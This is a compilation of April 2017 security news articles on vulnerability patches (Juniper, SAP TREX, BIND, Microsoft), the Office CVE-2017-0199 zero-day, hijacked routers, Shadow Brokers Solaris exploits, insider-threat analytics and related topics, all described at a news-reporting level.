Updates released by Juniper Networks for its Junos operating system patch several high and medium severity vulnerabilities. The company has also updated some of the third-party software used by its products.

Juniper Networks informed customers on Tuesday that it has launched an investigation into the new batch of exploits made public last week by the hacker group calling itself Shadow Brokers. The first round of files leaked by the Shadow Brokers in the summer of 2016 was found to contain some exploits targeting devices running Juniper’s ScreenOS.

Until it determines if any of its products are targeted by the newly released exploits, which are believed to have been used by the NSA-linked Equation Group, Juniper Networks has released updates that patch several vulnerabilities in the FreeBSD-based Junos OS.

The most severe of the flaws, based on its CVSS score, is CVE-2016-10142, an issue related to the IPv6 protocol specification, namely ICMP Packet Too Big (PTB) messages. The vulnerability can be exploited for denial-of-service (DoS) attacks.

Another high severity flaw is CVE-2016-1886, a keyboard driver buffer overflow that can be exploited to cause a DoS condition, read parts of the kernel memory, or execute arbitrary code.

It’s worth pointing out that CVE-2016-10142 and CVE-2016-1886 are not specific to Juniper products; the vulnerabilities are in FreeBSD and other Linux distributions.

The third high severity vulnerability is CVE-2017-2313, a DoS issue that affects some Junos systems when BGP is enabled.

The medium severity weaknesses disclosed by the company this week are DoS flaws affecting various configurations. These security holes are tracked as CVE-2017-2313, CVE-2017-2312 and CVE-2017-2340.

Juniper is not aware of any instances where these vulnerabilities have been exploited for malicious purposes.

The vendor also announced patches for vulnerabilities affecting its NorthStar Controller application, and updates for the BIND and NTP components used by the company’s products. The NTP and BIND patches applied by Juniper were first made available several months ago, and other fixes have since been released for both NTP and BIND.


Office 0-Day Abused in Latentbot, WingBird Attacks

13.4.2017 securityweek Vulnerebility
A Microsoft Office 0-day vulnerability that was disclosed just days ago is already being exploited by attackers associated with malware families such as Latentbot and WingBird.

Tracked as CVE-2017-0199, the security bug allows a malicious actor to craft a RTF (Rich Text Format) document that would download and execute a Visual Basic script containing PowerShell commands. Microsoft has already addressed the flaw, but not quick enough to prevent malware such as the Dridex banking Trojan from abusing it in attacks.

The exploit for this vulnerability was found to bypass most mitigations available before a patch was released, and could also render Protected View useless, security researchers discovered. This means that attacks leveraging the vulnerability don’t require user interaction to be successful.

The exploit leverages Office’s Object Linking and Embedding (OLE) functionality to link to an HTA (HTML Application) file hosted on a remote server. When the user opens the RTF document received via spam email, winword.exe issues a HTTP request to retrieve the malicious HTA file, which loads and executes the malicious Visual Basic script. In turn, the script downloads and executes malware.

According to FireEye, the malicious scripts used in these incidents were also observed terminating the winword.exe processes (to hide a prompt from OLE2link) and loading decoy documents.

The security researchers stumbled upon such attacks designed to distribute a newer variant of Latentbot, a highly obfuscated bot that has been active since 2013. The bot has a highly modular plugin architecture and has been also associated with the Pony infostealer.

Latentbot packs different injection mechanisms for Windows XP (x86) and Windows 7 operating systems: it uses Attrib.exe patching and Svchost code Injection on the former, but injects code into svchost.exe directly on the latter.

Another attack abusing this vulnerability consisted of two malicious stages, and distributed a variant of the dropper known as WingBird (which has similar characteristics as FinFisher). Heavily obfuscated, the malware packs several anti-analysis measures, including a custom VM to slow analysis, and was recently associated with the activities of a threat group known as NEODYMIUM.

Netskope Threat Research Labs, on the other hand, say that this Office zero-day vulnerability can also be linked to the Godzilla botnet loader. The researchers observed that the IPs related to the loader were serving payloads associated with exploits for this bug, but say that they “cannot speculate that the spam campaign and zero-day are related,” although the same attack group appears to be behind the attacks.

Office users are advised to apply the newly released patches as soon as possible, to ensure they are protected from these attacks.


Critical bug in SAP TREX affects SAP HANA and other applications
13.4.2017 securityaffairs Vulnerebility

SAP has issued a security patch for the SAP TREX search engine that addresses also a two-years old critical vulnerability.
SAP has issued a security patch for the SAP TREX search engine that addresses multiple vulnerabilities discovered by the experts in a 2015 patch released in December 2015.

The SAP TREX search engine is used by many SAP products, including SAP HANA and itsNetWeaver application and integration platform.

“SAP, the largest enterprise software maker, closed a critical vulnerability affecting SAP’s search engine TREX. The issue stayed exposed almost 2 years.” reads a blog post published by the company ERPScan that discovered the flaw. “The vulnerable component is included in the old SAP NetWeaver platform as well as in the new SAP HANA one, which makes it one of the most widespread and severe SAP server-side issues so far with CVSS score 9.4 out of 10. The vulnerability was identified by specialists at ERPScan,” “If exploited, the vulnerability would allow a remote attacker to get full control over the server without authorization.”

SAP was affected by a critical code injection vulnerability (SAP Security Note 2419592) that he company addressed with the 2015 patch, unfortunately the problem was not completely solved.

Mathieu Geli from ERPScan discovered that the TREXNet communication protocol implemented in the SAP TREX search engine did not implement an authentication mechanism.

“Originally, the vulnerability was discovered in SAP HANA in 2015 and the corresponding SAP Security Note (2234226) was released in December 2015. The issue was dubbed a potential technical information disclosure and fixed by removing some critical functions.” continues the post. “Later on, Mathieu Geli from ERPScan conducted a further research and revealed that the vulnerability was still exploitable. He found out that TREXNet, an internal communication protocol used by TREX, did not provide an authentication procedure. “

The expert made a reverse engineering of a protocol for HANA and then for the SAP TREX search engine. Both share a common protocol, for this reason the exploit could be easily adapted. He highlighted that SAP fixed just some features related to the core protocol.

“I reversed a protocol for HANA and then for the TREX search engine. As they share a common protocol, the exploit has been easily adapted. SAP fixed some features, but not everything affecting the core protocol. It was still possible to get full control on the server even with a patched TREX.” explained the expert.

The vulnerability, tracked as CVE-2017-7691, could be exploited by an attacker to read or create operating system files by sending a crafted request to TREXNet ports.

The flaw was fized along with other bugs in SAP’s April security release.


Not Just Criminals, But Governments Were Also Using MS Word 0-Day Exploit
13.4.2017 thehackernews Vulnerebility
Recently we reported about a critical code execution vulnerability in Microsoft Word that was being exploited in the wild by cyber criminal groups to distribute malware like Dridex banking trojans and Latentbot.
Now, it turns out that the same previously undisclosed vulnerability in Word (CVE-2017-0199) was also actively being exploited by the government-sponsored hackers to spy on Russian targets since at least this January.
The news comes after security firm FireEye, that independently discovered this flaw last month, published a blog post, revealing that FinSpy spyware was installed as early as January using the same vulnerability in Word that was patched on Tuesday by Microsoft.
For those unaware, the vulnerability (CVE-2017-0199) is a code execution flaw in Word that could allow an attacker to take over a fully patched and up to date computer when the victim opens a Word document containing a booby-trapped OLE2link object, which downloads a malicious HTML app from a server, disguised as a document created in Microsoft's RTF (Rich Text Format).
FinSpy or FinFisher is associated with the controversial UK-based firm Gamma Group, which sells so-called "lawful intercept" spyware to governments around the world.
"Though only one Finspy user has been observed leveraging this zero-day exploit, the historical scope of Finspy, a capability used by several nation-states, suggests other customers had access to it," FireEye researchers said.
"Additionally, this incident exposes the global nature of cyber threats and the value of worldwide perspective—a cyber espionage incident targeting Russians can provide an opportunity to learn about and interdict crime against English speakers elsewhere."
Months later in March, the same then-zero-day vulnerability was used to install Latentbot, a bot-like, information-stealing and remote-access malware package used by financially motivated criminals.
Latentbot has several malicious capabilities including credential theft, remote desktop functions, hard drive and data wiping, and the ability to disable antivirus software.
FireEye said criminals used social engineering to trick victims into opening the attachments with generic subject lines like "hire_form.doc", "!!!!URGENT!!!!READ!!!.doc", "PDP.doc", and "document.doc".
However, on Monday, the criminals behind the attack modified their campaign to deliver a different malware package called Terdot, which then installed software that uses the TOR anonymity service to hide the identity of the servers it contacted with.
According to FireEye researchers, the MS Word exploit used to install Finspy on Russian computers by government spies and the one used in March to install Latentbot by criminal hackers was obtained from the same source.
This finding highlights that someone who initially discovered this zero-day vulnerability sold it to many actors, including the commercial companies who deals in buying and selling of zero-day exploits as well as financially motivated online criminals.
Also, just Monday evening, Proofpoint researchers too discovered a massive campaign of spam email targeting millions of users across financial institutions in Australia with the Dridex banking malware, again, by exploiting the same vulnerability in Word.
FireEye researchers are still not sure of the source for the exploit that delivered the Dridex banking trojan, but it is possible that the vulnerability disclosure by McAfee last week provided insight that helped Dridex operators use the flaw, or that someone with access to the Word exploit gave it to them.
Microsoft patched the MS Word vulnerability on Tuesday, which hackers, as well as government spies, had been exploiting it for months. So, users are strongly advised to install updates as soon as possible to protect themselves against the ongoing attacks.


BIND Updates Patch Three Vulnerabilities

13.4.2017 securityweek Vulnerebility

The Internet Systems Consortium (ISC) announced this week that updates released for the DNS software BIND patch several denial-of-service (DoS) vulnerabilities that can be exploited remotely.

BIND versions 9.9.9-P8, 9.10.4-P8 and 9.11.0-P5 address three new security holes that could lead to an assertion failure.

The most serious of the flaws, with a “high” severity rating and a CVSS score of 7.5, is CVE-2017-3137. The vulnerability allows an attacker to cause a DoS condition, and it mainly affects recursive resolvers, but authoritative servers could also be vulnerable if they perform recursion.

“A server which is performing recursion can be forced to exit with an assertion failure if it can be caused to receive a response containing CNAME or DNAME resource records with certain ordering,” ISC said in its advisory.

Another vulnerability patched with the latest BIND updates is CVE-2017-3136, a medium severity issue that affects servers configured to use DNS64 with the "break-dnssec yes;" option.

The third flaw, CVE-2017-3138, can be exploited to cause the BIND name server (named) process to exit by sending it a null command string on its control channel. However, the flaw can only be exploited remotely from hosts that are allowed access to the control channel.

ISC said there was no evidence that any of these vulnerabilities had been exploited in the wild.

BIND vulnerable to new reflection attacks

Earlier this month, Ixia security software engineer Oana Murarasu reported finding a new DDoS attack amplification method. The expert discovered that BIND’s recursive DNS resolver allows reflection attacks through root DNAME query responses.

“This amplification attack generates responses 10 or more times larger than the query sent,” Murarasu explained. “For every 1 megabit of traffic sent, 10 megabits is sent to the victim.”

The issue has been reported to ISC, but the organization determined that these attacks are possible due to a protocol design flaw and not a vulnerability in BIND itself. Ixia said Microsoft’s DNS server is not susceptible to such attacks.


Tens of thousands of compromised routers abused in WordPress attacks
13.4.2017 securityaffairs Attack

Hackers exploited the CVE-2014-9222 flaw, also known as ‘Misfortune Cookie’, to hack thousands of home routers and abuse them for WordPress attacks.
According to the experts at the security firm Wordfence tens of thousands, of home routers have been hacked and used to power cyber attacks on WordPress websites.
The security firm observed a spike in the number of attacks originated from Algeria and that targeted customer websites. Further investigation revealed that the attacks were launched from more than 10,000 IP addresses, most of which were associated with state-owned telecoms company Telecom Algeria.

“Last week, while creating the Wordfence monthly attack report, we noticed that Algeria had moved from position 60 in our “Top Attacking Countries” list to position 24. That was a big jump and we were curious why Algeria had climbed the attack rankings so rapidly.” reads the analysis published by Wordfence.

“What we discovered on closer examination is that over 10,000 IP addresses in Algeria were attacking WordPress websites in March. Most IPs were only launching between 50 and 1000 attacks during the entire month.”

The hackers exploited vulnerabilities in the routers provided by Telecom Algeria to its customers, then compromised the devices to launch brute-force and other WordPress attacks.

Wordfence identified compromised routers from 27 ISPs worldwide involved in the WordPress attacks. The routers of more than a dozen of these ISPs are listening on port 7547 that is used by the ISPs for remote management purposes, the experts noticed that all the flawed devices are running a vulnerable version of the AllegroSoft RomPager web server.

All the RomPager versions prior to 4.34 are affected by a critical vulnerability tracked as CVE-2014-9222, also known as ‘Misfortune Cookie‘.

WordPress attacks

The flaw was reported in December 2014 by researchers at Check Point Software Technologies who discovered that more than 12 Million Home Routers were affected by the issue.

The vulnerability could be exploited by an attacker to run a man-in-the-middle attack on traffic going to and from home routers from every manufacturer.

Once an attacker compromise a router, it could target any other devices on a local network, such as a smart TV or a printer.

The flaw can be exploited to hijack a large number of devices made by Huawei, Edimax, D-Link, TP-Link, ZTE, ZyXEL and other vendors.

The routers provided by 14 of the 28 ISPs are vulnerable to Misfortune Cookie attacks.
According Wordfence, in just three days, 6.7 percent of all attacks aimed at protected WordPress websites came from home routers that have port 7547 open.

Last month, Wordfence observed more than 90,000 unique IP addresses from the 28 ISPs associated with compromised routers, most of them generate less than 1,000 attacks over the course of up to 48 hours, after which they stop.

“In just the past month we have seen over 90,000 unique IP addresses at 28 ISPs that fit our compromised-router attack pattern. We monitor these attacks across our customer websites which is an attack surface of over 2 million websites.” states Wordfence. “We only see a sample of the attacks that all websites globally experience. If you extrapolate the numbers, it indicates that there is a very large number of compromised ISP routers out there performing attacks and acting in concert.”

WordFence has published a free online tool that can be used to check if a router has port 7547 open.


Prison Inmates Built PCs from e-Waste and Connected Online Using Prison Network

13.4.2017 thehackernews Hacking

Can you imagine your world without the Internet?
I know it's hard to imagine your life without the Internet, and the same was the case of two Ohio prisoners who built personal computers from parts from e-waste, hid them in the ceiling, and connected those PCs to the Internet via the prison's network.
The incident occurred in 2015 but has now been made public by the State of Ohio's Office of the Inspector General, which published a 50-page report [PDF] on Tuesday, following almost a year-long investigation.
According to the report, a prison work program has backfired two inmates of Marion Correctional Institution in Ohio, Florida, who smuggled computer parts from an e-waste recycling workshop and built two clandestine computers out of them.
The unsupervised inmates later hid the computers behind a plywood board in the ceiling of a training room, and then connected those working PCs to the Ohio Department of Rehabilitation and Correction (ODRC) network to access the Internet.
But once the inmates got online, unsurprisingly, they used their skills to break the law.
The prisoners accessed the internal records of other inmates, created inmate passes for restricted areas, accessed websites with information about manufacturing drugs, weapons, and explosives, and apply for credit cards under another prisoner's name for a planned tax fraud scheme, Ohio's government watchdog said.
Besides this, the forensics team also found "self-signed certificates, Pidgin chat accounts, Tor sites, Tor geo exit nodes, ether soft, pornography, videos, VideoLan, virtual phone, and other various software."
The scheme was discovered after prison technology employee Gene Brady alerted about unusual levels of internet activity on a contractor's account on days when the employee was not scheduled to work.
Ultimately, a total of five inmates were identified as being involved with the hidden computers during the investigation:
Stanislov Transkiy – Executive committee chairman of Recycling.
Leeshan McCullough – Chairman of aquaculture.
Robert Cooper – Chairman of horticulture.
Matthew Brown – Chairman of environmental education.
Adam Johnston – Executive committee treasurer.
All the five inmates have now been separated and moved to other correctional facilities.
"We will thoroughly review the reports and take any additional steps necessary to prevent these types of things from happening again," the ODRC said in a statement.
"It's of critical importance that we provide necessary safeguards in regards to the use of technology while still providing opportunities for offenders to participate in meaningful and rehabilitative programming."
The Marion Correctional Institution (MCI), which houses nearly 2,500 inmates, operates many programs to educate or provide services to the community, including the MCI Green Initiative to revamp the institution's trash and recycling processes.


Psycho-Analytics Could Aid Insider Threat Detection

12.4.2017 securityweek Safety
Psycho-Analytics Could Help Detect Future Malicious Behavior

The insider threat is perhaps the most difficult security risk to detect and contain -- and concern is escalating to such an extent that a new bill, H.R.666 - Department of Homeland Security Insider Threat and Mitigation Act of 2017, passed through Congress unamended in January 2017.

The bill text requires the Department of Homeland Security (DHS) to establish an Insider Threat Program, including training and education, and to "conduct risk mitigation activities for insider threats." What it does not do, however, is explain what those 'mitigation activities' should comprise.

One difficulty is that the insider is not a uniform threat. It includes the remote attacker who becomes an insider through using legitimate but stolen credentials, the naive employee, the opportunistic employee, and the malicious insider. Of these, the malicious insider is the most intransigent concern.

Psycho-analytics Used for Insider Threat Detection

Traditional security controls, such as access control and DLP, have some but little effect. In recent years, these have been supplemented by user behavior analytics (UBA), using machine learning to detect anomalous user behavior within the network.

"Behavioral analytics is the only way to... get real insight into insider threat," explains Nir Polak, CEO of Exabeam. "UBA tells you when someone is doing something that is unusual and risky, on an individual basis and compared to peers. UBA cuts through the noise to give real insight – any agencies looking to get a handle on insider threat should be looking closely at UBA."

Humphrey Christian, VP of Product Management, at Bay Dynamics, advocates a combination of UBA and risk management. "A threat is not a threat if it's targeting an asset that carries minimal value to the organization. An unusual behavior is also not a threat if it was business justified, such as it was approved by the employee's manager," he told SecurityWeek. "Once an unusual behavior is identified, the application owner who governs the application at risk, must qualify if he indeed gave the employee access to the asset. If the answer is 'no', then that alert should be sent to the top of the investigation pile."

Learn to Detect Insider ThreatsThis week a new paper published by the Intelligence and National Security Alliance (INSA) proposes that physical user behavioral analytics should go a step further and incorporate psycho-analytics set against accepted behavior models. These are not just the baseline of acceptable behavior on the network, but incorporate the psychological effect of life events both inside and outside of the workplace. The intent is not merely to respond to anomalous behavior that has already happened, but to get ahead of the curve and be able to predict malicious behavior before it happens.

The INSA paper starts from the observation that employees don't just wake up one morning and decide to be malicious. Malicious behavior is invariably the culmination of progressive dissatisfaction. That dissatisfaction can be with events both within and outside the workplace. INSA's thesis is that clues to this progressive dissatisfaction could and should be detected by technology; machine learning (ML) and artificial intelligence (AI).

This early detection would allow managers to intervene and perhaps help a struggling employee and prevent a serious security event.

Early signs of unhappiness within the workplace can be relatively easy to detect when they manifest as 'counterproductive work behaviors' (CWBs). INSA suggests that there are three key insights "that are key to detecting and mitigating employees at risk for committing damaging insider acts." CWBs do not occur in isolation; they usually escalate; and they are seldom spontaneous.

Successful insider threat mitigation can occur when early non-harmful CWBs can be detected before they escalate.

Using existing studies, such as the Diagnostic and Statistical Manual of Mental Disorders Vol. 5 (DSM-5), INSA provides a table of stressors and potentially linked CWBs. For example, emotional stress at the minor level could lead to repeated tardiness; at a more serious level it could lead to bullying co-workers and unsafe (dangerous) behavior. INSA's argument is that while individual CWBs might be missed by managers and HR, patterns -- and any escalation of stress indicators -- could be detected by ML algorithms. This type of user behavior analytics goes beyond anomalous network activity and seeks to recognize stressed user behavior that could lead to anomalous network activity before it happens.

But it still suffers from one weakness -- that is, where the stressors that affect the user's work occur entirely outside of the workplace; such as divorce, financial losses, or family illness. Here INSA proposes a more radical approach, but one that would work both inside and outside the workplace.

"In particular," it suggests, "sophisticated psycholinguistic tools and text analytics can monitor an employee's communications to identify life stressors and emotions and help detect potential issues early in the transformation process."

The idea is to monitor and analyze users' communications, which could include tweets and blogs. The analytics would look for both positive and negative words. An example is given. "I love food ... with ... together we ... in ... very ... happy." This sequence could easily appear in a single tweet; but the use of 'with', 'together', and 'in' would suggest an inclusive and agreeable temperament.

In fairness to doubters, INSA has done itself no favors with the misuse of a second example. Here Chelsea (formerly Bradley) Manning is quoted. "A second blog post," says INSA, "substantiates that Life Event and identifies an additional one, 'Relationship End/Divorce' with two mentions for each Life Event." The implication is that psycholinguistic analysis of this post would have highlighted the stressors in Manning's life and warned employers of the potential for malicious activity. The problem, however, is that the quoted section comes not from a Manning blog post before the event, but from the chat logs of his conversation with Lamo in May 2010 (see Wired) after WikiLeaks had started publishing the documents. The linguistic analysis in this case might have helped explain Manning's actions, but could do nothing to forewarn the authorities.

The point, however, is that psycholinguistic analysis has the potential to highlight emotional status, and over time, highlight individuals on an escalating likelihood of developing first minor CWBs and ultimately major CWBs. The difficulty is that it really is kind of creepy. That creepiness is acknowledged by INSA. "Use of these tools entails extreme care to assure individuals' civil or privacy rights are not violated," it says. "Only authorized information should be gathered in accordance with predefined policies and legal oversight and only used for clearly defined objectives. At no point should random queries or 'What If' scenarios be employed to examine specific individuals without predicate and then seek to identify anomalous bad behavior."

Users' decreasing expectation of privacy would suggest that sooner or later psycholinguistic analysis for the purpose of identifying potential malicious insiders before they actually become malicious insiders will become acceptable. In the meantime, however, it should be used with extreme caution and with the clear, unambiguous informed consent of users. What INSA is advocating, however, is an example of what law enforcement agencies have been seeking for many years: the ability to predict rather than just respond to bad behavior.


Thousands of Hacked Routers Used for WordPress Attacks

12.4.2017 securityweek Attack
Tens of thousands of vulnerable home routers have been hacked and abused to launch attacks on WordPress websites, security firm Wordfence reported on Tuesday.

Last month, the company noticed that the number of attacks launched against customer websites from Algeria had increased significantly compared to the previous period. A closer analysis of the more than 10,000 attacking IP addresses revealed that most were associated with state-owned telecoms company Telecom Algeria.

Wordfence has determined that hackers exploited vulnerabilities in the routers provided by Telecom Algeria to customers, and then abused the hijacked devices to launch brute-force and other types of attacks on WordPress sites.

Researchers identified compromised routers from 27 other ISPs worldwide, including ones in Pakistan, India, the Philippines, Turkey, Egypt, Morocco, Malaysia, Brazil, Indonesia, Serbia, Saudi Arabia, Russia, Romania, Sri Lanka, Croatia and Italy.

The routers of more than a dozen of these ISPs are listening on port 7547, which is used by companies to manage their customers’ devices, and are running a vulnerable version of the AllegroSoft RomPager web server.

Versions prior to 4.34 of RomPager are affected by a critical vulnerability – tracked as CVE-2014-9222 and dubbed “Misfortune Cookie” – that can be exploited to hijack devices made by Huawei, Edimax, D-Link, TP-Link, ZTE, ZyXEL and other vendors. When they first disclosed the flaw back in December 2014, researchers warned that there had been at least 12 million vulnerable routers across most of the world’s countries.

According to Wordfence, 14 of the 28 ISPs provide routers vulnerable to Misfortune Cookie attacks. Researchers also pointed to another vulnerability, disclosed last year, that can be exploited to hijack home routers that use port 7547.

The company reported that, over the course of three days, 6.7 percent of all attacks aimed at protected WordPress websites came from home routers that have port 7547 open.

In the past month, Wordfence has seen more than 90,000 unique IP addresses from the 28 ISPs that appear to be associated with compromised routers. Experts said most IP addresses generate less than 1,000 attacks over the course of up to 48 hours, after which they stop.

WordFence has made available a simple online tool that can be used to check if a router has port 7547 open.


Terror Exploit Kit Rising as Sundown Disappears

12.4.2017 securityweek Exploit
One year after the exploit kit (EK) landscape was shaken by the sudden disappearance of the Angler and Nuclear kits, another change is happening in the segment. While the Sundown EK has been inactive for the past month or so, the recent Terror EK is being used in new campaigns, researchers say.

While not new, Sundown has been a small player in the EK market, and showed increased presence only after Neutrino became silent last September, although it didn’t make it to the top three by the end of the year.

Its operators have been highly active with the integration of new exploits and the adoption of new technologies, including steganography, which allowed them to hide exploits in harmless-looking image files.

Just weeks ago, Cisco Talos published an analysis of Sundown, revealing the latest changes the EK’s operators had adopted, such as a switch to new vulnerabilities to exploit and modifications to the landing page’s code, which started showing similarities to the RIG EK.

Soon after, however, security researchers were noticing the long silence Sundown had been showing for over a month, and started questioning its existence:


Follow
Kafeine @kafeine
Sundown (Beps) and Nebula out ? More than one month since last hits.
11:26 AM - 8 Apr 2017
32 32 Retweets 32 32 likes
Variants of Sundown also seem to have disappeared from the scene, including Bizarro and Greenflash, which could suggest a complete cease of operations, Malwarebytes Labs researchers suggest. However, it remains to be seen if Sundown is just taking a break or has completely vanished.

Simultaneously, another EK is picking up pace, namely Terror. Initially detailed in January and considered to be a Sundown variant due to many code similarities, Terror appears involved in several distribution campaigns, and the security researchers suggest that it could pose a real threat.

Terror EK’s author, which Trustwave identified on various underground forums by the handle @666_KingCobra, is selling the kit under different names, researchers say. Apparently, the threat has been also known under the names of Blaze, Neptune, and Eris.

The best known instance of Terror is engaged in a malvertising campaign distributing Smoke Loader, which Malwarebytes has been monitoring for a while. Leveraging various ad networks that generate low quality traffic, the campaign uses Internet Explorer, Flash, and Silverlight exploits to compromise users’ systems.

A newer campaign, however, uses a different landing page and no longer distributes Smoke Loader, but pushes the Andromeda malware as the final payload. Active only for a few days, the campaign redirects to the EK landing page either via the server 302 redirect call, or via script injection. Only Flash and Internet Explorer exploits are abused in these attacks.

“Sundown EK was notorious for stealing exploits from others and the tradition continues with more copy/paste from the ashes of dead exploit kits. If this harvesting was done on higher grade EKs, we would have a more potent threat but this isn’t the case here,” Malwarebytes concludes.


DARPA Wants Hardware With Built-in Security

12.4.2017 securityweek Safety
DARPA seeking solutions for more secure hardware

The U.S. Defense Advanced Research Projects Agency (DARPA) announced this week a new program that aims to develop a framework for building hack protections directly into hardware.

The agency pointed out that the integrated circuits found in many devices often have vulnerabilities that can be exploited with software exploits, and software patches represent only a temporary solution.

As part of a new 39-month program named System Security Integrated Through Hardware and Firmware (SSITH), DARPA hopes to receive proposals for new chip architectures which would disarm software attacks that leverage hardware flaws.

The SSITH project focuses on two main technical areas: developing a secure hardware architecture and tools to help manufacturers take advantage of security innovations, and identifying a methodology and metrics for determining the security status of new systems.

Some chip makers, such as Intel, have already been integrating various protections into their products, but DARPA wants design tools that would be widely available, leading to built-in security becoming a standard for integrated circuits used in U.S. Department of Defense and commercial systems.

DARPA said proposals should address one or more of the seven hardware vulnerability classes in the Common Weaknesses Enumeration (CWE) list. These include code injections, permissions and privileges, buffer errors, information leakage, resource management, numeric errors, and cryptographic issues.

The agency pointed out that more than 2,800 incidents have involved one of these vulnerabilities, and SSITH program manager Linton Salmon, of DARPA’s Microsystems Technology Office, believes more than 40 percent of software weaknesses can be addressed by removing these types of flaws.

“Security for electronic systems has been left up to software until now, but the overall confidence in this approach is summed up in the sardonic description of this standard practice as ‘patch and pray,’” said Salmon “This race against ever more clever cyberintruders is never going to end if we keep designing our systems around gullible hardware that can be fooled in countless ways by software.”

Experts interested in submitting a proposal can learn more about the project and have the opportunity to team up with others on Friday, April 21, 2017, at the Booz Allen Hamilton Conference Center.


Watch out! Shadow Brokers dump includes remote root exploits for Solaris boxes
12.4.2017 securityaffairs BigBrothers

The security expert Matthew Hickey has discovered two tools dubbed EXTREMEPARR and EBBISLAND which were specifically designed to target Solaris systems.
After the mysterious Shadow Brokers group has leaked the archive containing the stolen NSA hacking tools and exploits, security experts started analyzing the huge trove of data. Experts discovered that NSA operators developed an attack code to compromise Oracle’s Solaris.

The cyber security expert Matthew Hickey, the cofounder of British security shop Hacker House, digging the archive has discovered two tools dubbed EXTREMEPARR and EBBISLAND which were specifically designed to target Solaris systems.


Hacker Fantastic @hackerfantastic
EXTREMEPARR - 0day local privilege escalation attack working on Solaris 7,8,9,10 x86 & SPARC (confirmed & tested, platforms & versions.)
9:31 PM - 10 Apr 2017
87 87 Retweets 97 97 likes

Hacker Fantastic @hackerfantastic
CONFIRMED #0day EBBISLAND (EBBSHAVE) is a root RCE via RPC XDR overflow in Solaris 6, 7, 8, 9 & 10 (possibly newer) both SPARC and x86. pwn
12:00 AM - 11 Apr 2017
91 91 Retweets 102 102 likes
Both tools could be used by a logged-in user to escalate privileges to root, and obtain root access remotely over the network. The tools work on Solaris systems running versions 6 to 10 on x86 and Sparc, and experts believe it could work also on the latest build, version 11.

The EXTREMEPARR tool elevates the logged-in entity (i.g. a user, a script) to root by abusing dtappgather, file permissions, and the setuid binary at.

The EBBISLAND tool could be used to target any open RPC service to spawn a remote root shell on the flawed Solaris box. The EBBISLAND triggers a buffer overflow vulnerability in Solaris’s XDR code.

Solaris Exploit

Summarizing the NSA could open a root shell on any Solaris system, the experts noticed that the use of the exploits doesn’t request specific skills.

“These are prebuilt static binaries and you can run them out of the box with very little technical knowledge,” Hickey told The Register.

Follow
Hacker Fantastic @hackerfantastic
The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.
12:23 AM - 11 Apr 2017
68 68 Retweets 54 54 likes
Hickey scanned the Internet searching for vulnerable connected devices, he used the popular Shodan.io search engine, and found thousands of vulnerable systems. But the real threat, he said, was that a lot more of these machines are going to be running internally behind firewalls, and the exploit code could be used to root these once an attacker gets a foothold within an organization.
Many of the flawed machines identified by the expert run internally behind firewalls, this means that the above exploit code could be used by attackers to compromise the target network and move laterally.


Microsoft Issues Patches for Actively Exploited Critical Vulnerabilities
11.4.2017 thehackernews Vulnerebility
Besides a previously undisclosed code-execution flaw in Microsoft Word, the tech giant patches two more zero-day vulnerabilities that attackers had been exploiting in the wild for months, as part of this month's Patch Tuesday.
In total, Microsoft patches 45 unique vulnerabilities in its nine products, including three previously undisclosed vulnerabilities under active attack.
The first vulnerability (CVE-2017-0199) under attack is a remote-code execution flaw that could allow an attacker to remotely take over a fully patched and up to date computer when the victim opens a Word document containing a booby-trapped OLE2link object.
The attack can bypass most exploit mitigations developed by Microsoft, and according to Ryan Hanson of security firm Optiv, in some cases, exploits can execute malicious code even when Protected View is enabled.
As The Hacker News reported Monday, this code-execution flaw in Microsoft Word was being exploited by hackers to spread a version of infamous Dridex banking trojan.
Also, according to blog posts published Tuesday by security firms FireEye and Netskope, hackers are exploiting the same Word vulnerability to install Latentbot and Godzilla malware respectively.
Microsoft has released a fix for CVE-2017-0199 and credited Hanson with responsible reporting the critical vulnerability to the company.
Patch for Critical IE Flaw Being Exploited in the Wild
The company also pushed out a patch for another critical vulnerability (CVE-2017-0210) under active attack. The flaw is an elevation of privilege vulnerability in Internet Explorer that would allow an attacker to trick a victim into visiting a compromised website.
The vulnerability could allow the attacker to access sensitive information from one domain and inject it into another domain.
"The vulnerability by itself does not allow arbitrary code to be run. However, the vulnerability could be used in conjunction with another vulnerability (for example, a remote code execution vulnerability) that could take advantage of the elevated privileges when running arbitrary code," Microsoft's guidance for the flaw reads.
This IE vulnerability is also being exploited in the wild.
Another Critical Word Vulnerability Yet Unpatched!
The third previously undisclosed flaw (CVE-2017-2605) resides in the Encapsulated PostScript (EPS) filter in Microsoft Office, but Microsoft did not actually release an update for this flaw in Tuesday's update batch.
However, the tech giant issued an update for Microsoft Office that, by default, disable the EPS filter in MS Office as a defense measure. This Word vulnerability is also being exploited in the wild when a target opens a malicious EPS image in Word.
"Microsoft is aware of limited, targeted attacks that could leverage an unpatched vulnerability in the EPS filter and is taking this action to help reduce customer risk until the security update is released," the guidance for the flaw reads.
The company also issued a patch for Windows 10 Creators Update, which was made available on Tuesday, addressing some remote code execution flaws and elevation of privilege bugs.
In total, Microsoft rolled out 15 security updates on Tuesday patching dozens of unique CVEs in its products, including the Windows OS, Exchange Server, Edge and Internet Explorer, Office, Office Services and Office Web Apps, Visual Studio for Mac Silverlight and Adobe Flash.
Users are strongly advised to install updates as soon as possible in order to protect themselves against the active attacks in the wild on three separate Microsoft products.


Hackers Can Steal Your Passwords Just by Monitoring SmartPhone Sensors
11.4.2017 thehackernews Mobil
Do you know how many kinds of sensors your smartphone has inbuilt? And what data they gather about your physical and digital activities?
An average smartphone these days is packed with a wide array of sensors such as GPS, Camera, microphone, accelerometer, magnetometer, proximity, gyroscope, pedometer, and NFC, to name a few.
Now, according to a team of scientists from Newcastle University in the UK, hackers can potentially guess PINs and passwords – that you enter either on a bank website, app, your lock screen – to a surprising degree of accuracy by monitoring your phone's sensors, like the angle and motion of your phone while you are typing.
The danger comes due to the way malicious websites and apps access most of a smartphone's internal sensors without requesting any permission to access them – doesn't matter even if you are accessing a secure website over HTTPS to enter your password.
Your Phone doesn't Restrict Apps from Accessing Sensors' Data
Your smartphone apps usually ask your permissions to grant them access to sensors like GPS, camera, and microphone.
But due to the boom in mobile gaming and health and fitness apps over the last few years, the mobile operating systems do not restrict installed apps from accessing data from the plethora of motion sensors like accelerometer, gyroscope, NFC, motion and proximity.
Any malicious app can then use these data for nefarious purposes. The same is also true for malformed websites.
"Most smartphones, tablets and other wearables are now equipped with a multitude of sensors, from the well-known GPS, camera, and microphone to instruments such as the gyroscope, proximity, NFC, and rotation sensors and accelerometer," Dr. Maryam Mehrnezhad, the paper's lead researcher, said describing the research.
